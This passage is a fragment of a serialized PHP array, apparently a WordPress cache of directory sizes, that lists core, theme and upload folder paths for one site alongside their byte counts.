/wp-includes/blocks\";i:1209707;s:53:\"/home/websites/gsudice.dataconn.net/wp-includes/fonts\";i:289826;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/block-patterns\";i:9046;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/widgets\";i:156236;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/sitemaps/providers\";i:16350;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/sitemaps\";i:46283;s:54:\"/home/websites/gsudice.dataconn.net/wp-includes/assets\";i:11065;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/IXR\";i:33914;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/theme-compat\";i:15447;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/customize\";i:173484;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/ID3\";i:1143654;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/endpoints\";i:704928;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/fields\";i:22314;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api/search\";i:15180;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/rest-api\";i:827869;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Utility\";i:3310;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception/HTTP\";i:14365;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception/Transport\";i:919;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Exception\";i:16778;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Transport\";i:30090;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Cookie\";i:3865;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Auth\";i:1939;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Proxy\";i:3488;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests/Response\";i:2135;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/Requests\";i:139225;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/images/crystal\";i:15541;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/images/wlw\";i:4413;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/images/media\";i:2419;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/images/smilies\";i:10082;s:54:\"/home/websites/gsudice.dataconn.net/wp-includes/images\";i:103747;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/HTTP\";i:11487;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Cache\";i:39607;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Content/Type\";i:8015;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Content\";i:8015;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Net\";i:7493;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/XML/Declaration\";i:7098;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/XML\";i:7098;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Parse\";i:20551;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Decode/HTML\";i:17241;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie/Decode\";i:17241;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/SimplePie\";i:458625;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff/Engine\";i:31662;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff/Renderer\";i:5535;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/Text/Diff\";i:44010;s:52:\"/home/websites/gsudice.dataconn.net/wp-includes/Text\";i:56925;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/block-supports\";i:57444;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Poly1305\";i:112;s:91:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge\";i:602;s:88:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/Curve25519\";i:820;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core/ChaCha20\";i:224;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced/Core\";i:2444;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/namespaced\";i:2698;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Poly1305\";i:12912;s:84:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Curve25519/Ge\";i:7881;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Curve25519\";i:121645;s:83:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/SecretStream\";i:3624;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/ChaCha20\";i:5264;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core/Base64\";i:22135;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core\";i:450529;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Poly1305\";i:15980;s:86:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Curve25519/Ge\";i:8177;s:83:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/Curve25519\";i:122511;s:85:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/SecretStream\";i:3656;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32/ChaCha20\";i:6407;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/Core32\";i:437807;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src/PHP52\";i:4116;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/src\";i:1203596;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat/lib\";i:84845;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/sodium_compat\";i:1297228;s:52:\"/home/websites/gsudice.dataconn.net/wp-includes/pomo\";i:53584;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/js/codemirror\";i:1287141;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jquery/ui\";i:806754;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jquery\";i:1323191;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/js/plupload\";i:490206;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/js/jcrop\";i:18340;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/js/dist/vendor\";i:2371758;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/js/dist\";i:14745521;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/imgareaselect\";i:49035;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray/fonts\";i:155760;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray/img\";i:2856;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/lightgray\";i:210254;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/wordpress/images\";i:14207;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins/wordpress\";i:22831;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/skins\";i:233085;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/utils\";i:18822;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes/modern\";i:446221;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes/inlite\";i:452642;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/themes\";i:898863;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/image\";i:55874;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpdialogs\";i:3761;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/colorpicker\";i:4910;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/link\";i:32949;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wplink\";i:26476;s:81:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/directionality\";i:2749;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/lists\";i:97383;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/media\";i:57914;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wptextpattern\";i:11927;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wordpress\";i:50608;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/textcolor\";i:16237;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/tabfocus\";i:5336;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/compat3x/css\";i:8179;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/compat3x\";i:21758;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpview\";i:8994;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/fullscreen\";i:7779;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/charmap\";i:31811;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/paste\";i:113193;s:78:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpeditimage\";i:37716;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpemoji\";i:5099;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/hr\";i:1347;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpautoresize\";i:8332;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins/wpgallery\";i:4808;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/plugins\";i:606961;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce/langs\";i:15529;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/js/tinymce\";i:2853651;s:55:\"/home/websites/gsudice.dataconn.net/wp-includes/js/crop\";i:20004;s:73:\"/home/websites/gsudice.dataconn.net/wp-includes/js/mediaelement/renderers\";i:18880;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/js/mediaelement\";i:719405;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/js/thickbox\";i:31185;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/js/swfupload\";i:8715;s:50:\"/home/websites/gsudice.dataconn.net/wp-includes/js\";i:23969950;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/certificates\";i:233231;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/php-compat\";i:1203;s:57:\"/home/websites/gsudice.dataconn.net/wp-includes/PHPMailer\";i:224753;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/widgets\";i:27172;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-post\";i:209173;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-editor\";i:483181;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/components\";i:531384;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/format-library\";i:10926;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/nux\";i:14676;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/reusable-blocks\";i:5178;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/editor\";i:93521;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-library\";i:649649;s:77:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/list-reusable-blocks\";i:21928;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/customize-widgets\";i:30458;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-site\";i:181435;s:69:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/edit-widgets\";i:103495;s:72:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist/block-directory\";i:17844;s:56:\"/home/websites/gsudice.dataconn.net/wp-includes/css/dist\";i:2380020;s:51:\"/home/websites/gsudice.dataconn.net/wp-includes/css\";i:3025747;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/random_compat\";i:40843;s:47:\"/home/websites/gsudice.dataconn.net/wp-includes\";i:40074410;s:53:\"/home/websites/gsudice.dataconn.net/wp-admin/includes\";i:2888348;s:49:\"/home/websites/gsudice.dataconn.net/wp-admin/user\";i:3418;s:51:\"/home/websites/gsudice.dataconn.net/wp-admin/images\";i:444788;s:55:\"/home/websites/gsudice.dataconn.net/wp-admin/js/widgets\";i:139408;s:47:\"/home/websites/gsudice.dataconn.net/wp-admin/js\";i:1899502;s:61:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/light\";i:78320;s:62:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/modern\";i:77824;s:60:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/blue\";i:77743;s:62:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/coffee\";i:75220;s:64:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/midnight\";i:77712;s:61:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/ocean\";i:75241;s:65:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/ectoplasm\";i:77754;s:63:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors/sunrise\";i:77771;s:55:\"/home/websites/gsudice.dataconn.net/wp-admin/css/colors\";i:640955;s:48:\"/home/websites/gsudice.dataconn.net/wp-admin/css\";i:2491200;s:50:\"/home/websites/gsudice.dataconn.net/wp-admin/maint\";i:7260;s:52:\"/home/websites/gsudice.dataconn.net/wp-admin/network\";i:124281;s:44:\"/home/websites/gsudice.dataconn.net/wp-admin\";i:8731141;s:35:\"/home/websites/gsudice.dataconn.net\";i:48978993;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/sidebar\";i:4108;s:102:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/layout-wrapper-content\";i:10107;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/content\";i:4921;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/main\";i:32019;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-footer\";i:1854;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/inner-header/top-bar\";i:4122;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/inner-header\";i:17524;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/blog\";i:2568;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header/buttons\";i:1004;s:100:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header/top-bar\";i:4115;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts/front-header\";i:80577;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/template-parts\";i:153678;s:87:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/fonts/vendor\";i:17204;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/fonts\";i:17204;s:85:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/customizer\";i:3184810;s:96:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets/images\";i:2582145;s:98:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets/previews\";i:81173;s:89:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/header-presets\";i:2663318;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/images/header-shapes\";i:1630832;s:81:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/images\";i:3159902;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/theme\";i:598504;s:80:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources/admin\";i:27208;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/resources\";i:9650946;s:84:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/vendor/composer\";i:19045;s:75:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/vendor\";i:19223;s:77:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Core\";i:20615;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/FrontHeader\";i:49581;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/Footer\";i:3524;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/Header\";i:75137;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/InnerHeader\";i:2698;s:95:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components/MainContent\";i:2945;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Components\";i:172046;s:90:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/BuilderComponents\";i:14946;s:89:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Panel\";i:1565;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Sections\";i:3857;s:92:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer/Controls\";i:35039;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src/Customizer\";i:54214;s:72:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc/src\";i:329881;s:68:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/inc\";i:688923;s:70:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/admin\";i:18359;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/page-templates\";i:1008;s:64:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp\";i:11078376;s:82:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/fonts\";i:1409152;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/videos\";i:468755;s:83:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets/images\";i:1874112;s:76:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/assets\";i:3752019;s:75:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/parts\";i:2791;s:82:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/inc/patterns\";i:157065;s:73:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/inc\";i:161008;s:79:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo/templates\";i:13966;s:69:\"/home/websites/gsudice.dataconn.net/wp-content/themes/twentytwentytwo\";i:4114161;s:53:\"/home/websites/gsudice.dataconn.net/wp-content/themes\";i:15192565;s:54:\"/home/websites/gsudice.dataconn.net/wp-content/plugins\";i:28;s:62:\"/home/websites/gsudice.dataconn.net/wp-content/uploads/2022/02\";i:1071492;s:59:\"/home/websites/gsudice.dataconn.net/wp-content/uploads/2022\";i:1071492;s:54:\"/home/websites/gsudice.dataconn.net/wp-content/uploads\";i:1071492;s:32:\"/var/www/html/wp-content/upgrade\";i:0;s:24:\"/var/www/html/wp-content\";i:28;s:40:\"/var/www/html/wp-includes/block-supports\";i:58180;s:29:\"/var/www/html/wp-includes/ID3\";i:1143654;s:38:\"/var/www/html/wp-includes/images/media\";i:2419;s:40:\"/var/www/html/wp-includes/images/smilies\";i:10082;s:40:\"/var/www/html/wp-includes/images/crystal\";i:15541;s:36:\"/var/www/html/wp-includes/images/wlw\";i:4413;s:32:\"/var/www/html/wp-includes/images\";i:103747;s:42:\"/var/www/html/wp-includes/js/imgareaselect\";i:49035;s:34:\"/var/www/html/wp-includes/js/jcrop\";i:18340;s:51:\"/var/www/html/wp-includes/js/mediaelement/renderers\";i:18880;s:41:\"/var/www/html/wp-includes/js/mediaelement\";i:719405;s:33:\"/var/www/html/wp-includes/js/crop\";i:20004;s:37:\"/var/www/html/wp-includes/js/plupload\";i:490206;s:37:\"/var/www/html/wp-includes/js/thickbox\";i:31185;s:38:\"/var/www/html/wp-includes/js/jquery/ui\";i:807176;s:35:\"/var/www/html/wp-includes/js/jquery\";i:1323522;s:38:\"/var/www/html/wp-includes/js/swfupload\";i:8715;s:56:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray/img\";i:2856;s:58:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray/fonts\";i:155760;s:52:\"/var/www/html/wp-includes/js/tinymce/skins/lightgray\";i:210254;s:59:\"/var/www/html/wp-includes/js/tinymce/skins/wordpress/images\";i:14207;s:52:\"/var/www/html/wp-includes/js/tinymce/skins/wordpress\";i:22831;s:42:\"/var/www/html/wp-includes/js/tinymce/skins\";i:233085;s:42:\"/var/www/html/wp-includes/js/tinymce/utils\";i:18822;s:52:\"/var/www/html/wp-includes/js/tinymce/plugins/wpemoji\";i:5099;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/image\";i:55874;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wpgallery\";i:4808;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/paste\";i:113193;s:56:\"/var/www/html/wp-includes/js/tinymce/plugins/colorpicker\";i:4910;s:47:\"/var/www/html/wp-includes/js/tinymce/plugins/hr\";i:1347;s:58:\"/var/www/html/wp-includes/js/tinymce/plugins/wptextpattern\";i:11927;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wpdialogs\";i:3761;s:55:\"/var/www/html/wp-includes/js/tinymce/plugins/fullscreen\";i:7779;s:57:\"/var/www/html/wp-includes/js/tinymce/plugins/wpautoresize\";i:8332;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/media\";i:57914;s:57:\"/var/www/html/wp-includes/js/tinymce/plugins/compat3x/css\";i:8179;s:53:\"/var/www/html/wp-includes/js/tinymce/plugins/compat3x\";i:21758;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/textcolor\";i:16237;s:52:\"/var/www/html/wp-includes/js/tinymce/plugins/charmap\";i:31811;s:53:\"/var/www/html/wp-includes/js/tinymce/plugins/tabfocus\";i:5336;s:59:\"/var/www/html/wp-includes/js/tinymce/plugins/directionality\";i:2749;s:50:\"/var/www/html/wp-includes/js/tinymce/plugins/lists\";i:97383;s:51:\"/var/www/html/wp-includes/js/tinymce/plugins/wplink\";i:26476;s:54:\"/var/www/html/wp-includes/js/tinymce/plugins/wordpress\";i:50608;s:51:\"/var/www/html/wp-includes/js/tinymce/plugins/wpview\";i:8994;s:56:\"/var/www/html/wp-includes/js/tinymce/plugins/wpeditimage\";i:37716;s:49:\"/var/www/html/wp-includes/js/tinymce/plugins/link\";i:32949;s:44:\"/var/www/html/wp-includes/js/tinymce/plugins\";i:606961;s:42:\"/var/www/html/wp-includes/js/tinymce/langs\";i:15529;s:50:\"/var/www/html/wp-includes/js/tinymce/themes/modern\";i:446221;s:50:\"/var/www/html/wp-includes/js/tinymce/themes/inlite\";i:452642;s:43:\"/var/www/html/wp-includes/js/tinymce/themes\";i:898863;s:36:\"/var/www/html/wp-includes/js/tinymce\";i:2853651;s:39:\"/var/www/html/wp-includes/js/codemirror\";i:1287141;s:40:\"/var/www/html/wp-includes/js/dist/vendor\";i:2371758;s:33:\"/var/www/html/wp-includes/js/dist\";i:14796235;s:28:\"/var/www/html/wp-includes/js\";i:24021139;s:40:\"/var/www/html/wp-includes/block-patterns\";i:9046;s:42:\"/var/www/html/wp-includes/Text/Diff/Engine\";i:31662;s:44:\"/var/www/html/wp-includes/Text/Diff/Renderer\";i:5535;s:35:\"/var/www/html/wp-includes/Text/Diff\";i:44010;s:30:\"/var/www/html/wp-includes/Text\";i:56925;s:36:\"/var/www/html/wp-includes/php-compat\";i:1203;s:35:\"/var/www/html/wp-includes/customize\";i:173484;s:32:\"/var/www/html/wp-includes/assets\";i:11065;s:51:\"/var/www/html/wp-includes/SimplePie/XML/Declaration\";i:7098;s:39:\"/var/www/html/wp-includes/SimplePie/XML\";i:7098;s:41:\"/var/www/html/wp-includes/SimplePie/Parse\";i:20551;s:47:\"/var/www/html/wp-includes/SimplePie/Decode/HTML\";i:17241;s:42:\"/var/www/html/wp-includes/SimplePie/Decode\";i:17241;s:40:\"/var/www/html/wp-includes/SimplePie/HTTP\";i:11487;s:41:\"/var/www/html/wp-includes/SimplePie/Cache\";i:39607;s:48:\"/var/www/html/wp-includes/SimplePie/Content/Type\";i:8015;s:43:\"/var/www/html/wp-includes/SimplePie/Content\";i:8015;s:39:\"/var/www/html/wp-includes/SimplePie/Net\";i:7493;s:35:\"/var/www/html/wp-includes/SimplePie\";i:458625;s:41:\"/var/www/html/wp-includes/rest-api/search\";i:15180;s:44:\"/var/www/html/wp-includes/rest-api/endpoints\";i:705001;s:41:\"/var/www/html/wp-includes/rest-api/fields\";i:22314;s:34:\"/var/www/html/wp-includes/rest-api\";i:827942;s:44:\"/var/www/html/wp-includes/blocks/post-author\";i:5500;s:42:\"/var/www/html/wp-includes/blocks/shortcode\";i:8116;s:39:\"/var/www/html/wp-includes/blocks/search\";i:16747;s:45:\"/var/www/html/wp-includes/blocks/post-excerpt\";i:7385;s:38:\"/var/www/html/wp-includes/blocks/image\";i:30212;s:43:\"/var/www/html/wp-includes/blocks/post-terms\";i:3929;s:43:\"/var/www/html/wp-includes/blocks/site-title\";i:4469;s:46:\"/var/www/html/wp-includes/blocks/post-comments\";i:11301;s:45:\"/var/www/html/wp-includes/blocks/latest-posts\";i:16736;s:42:\"/var/www/html/wp-includes/blocks/post-date\";i:792;s:40:\"/var/www/html/wp-includes/blocks/heading\";i:4991;s:41:\"/var/www/html/wp-includes/blocks/loginout\";i:455;s:41:\"/var/www/html/wp-includes/blocks/archives\";i:6698;s:37:\"/var/www/html/wp-includes/blocks/code\";i:7774;s:38:\"/var/www/html/wp-includes/blocks/quote\";i:10971;s:49:\"/var/www/html/wp-includes/blocks/term-description\";i:588;s:42:\"/var/www/html/wp-includes/blocks/separator\";i:13254;s:38:\"/var/www/html/wp-includes/blocks/audio\";i:11211;s:39:\"/var/www/html/wp-includes/blocks/column\";i:687;s:43:\"/var/www/html/wp-includes/blocks/media-text\";i:19797;s:40:\"/var/www/html/wp-includes/blocks/buttons\";i:15767;s:53:\"/var/www/html/wp-includes/blocks/post-navigation-link\";i:865;s:44:\"/var/www/html/wp-includes/blocks/query-title\";i:887;s:45:\"/var/www/html/wp-includes/blocks/widget-group\";i:319;s:38:\"/var/www/html/wp-includes/blocks/table\";i:30378;s:43:\"/var/www/html/wp-includes/blocks/categories\";i:7307;s:37:\"/var/www/html/wp-includes/blocks/html\";i:6648;s:52:\"/var/www/html/wp-includes/blocks/post-featured-image\";i:23629;s:46:\"/var/www/html/wp-includes/blocks/post-template\";i:12819;s:40:\"/var/www/html/wp-includes/blocks/pattern\";i:269;s:45:\"/var/www/html/wp-includes/blocks/site-tagline\";i:4180;s:37:\"/var/www/html/wp-includes/blocks/file\";i:20282;s:41:\"/var/www/html/wp-includes/blocks/calendar\";i:5089;s:45:\"/var/www/html/wp-includes/blocks/post-content\";i:384;s:54:\"/var/www/html/wp-includes/blocks/query-pagination-next\";i:740;s:45:\"/var/www/html/wp-includes/blocks/preformatted\";i:4198;s:58:\"/var/www/html/wp-includes/blocks/query-pagination-previous\";i:752;s:45:\"/var/www/html/wp-includes/blocks/social-links\";i:55550;s:41:\"/var/www/html/wp-includes/blocks/freeform\";i:42190;s:38:\"/var/www/html/wp-includes/blocks/group\";i:11365;s:37:\"/var/www/html/wp-includes/blocks/more\";i:6691;s:38:\"/var/www/html/wp-includes/blocks/video\";i:22014;s:38:\"/var/www/html/wp-includes/blocks/verse\";i:4285;s:42:\"/var/www/html/wp-includes/blocks/site-logo\";i:20232;s:45:\"/var/www/html/wp-includes/blocks/text-columns\";i:8935;s:46:\"/var/www/html/wp-includes/blocks/template-part\";i:16158;s:40:\"/var/www/html/wp-includes/blocks/columns\";i:17299;s:43:\"/var/www/html/wp-includes/blocks/navigation\";i:130884;s:51:\"/var/www/html/wp-includes/blocks/navigation-submenu\";i:8767;s:38:\"/var/www/html/wp-includes/blocks/query\";i:4610;s:41:\"/var/www/html/wp-includes/blocks/nextpage\";i:5966;s:40:\"/var/www/html/wp-includes/blocks/gallery\";i:88463;s:39:\"/var/www/html/wp-includes/blocks/button\";i:21793;s:39: